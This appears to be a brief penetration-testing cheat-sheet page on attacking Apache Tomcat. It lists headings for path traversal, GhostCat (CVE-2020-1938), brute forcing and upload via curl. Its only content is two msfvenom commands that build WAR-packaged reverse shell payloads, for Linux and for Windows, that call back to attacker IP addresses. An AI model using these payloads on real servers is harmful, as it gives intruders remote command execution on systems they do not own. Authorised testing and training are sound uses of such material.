Apache Tomcat
Introduction
Reverse shell
# Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
# Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war
Upload via curl
Tomcat path traversal
GhosCat (CVE-2020-1938)
Brute forcing
References
Last updated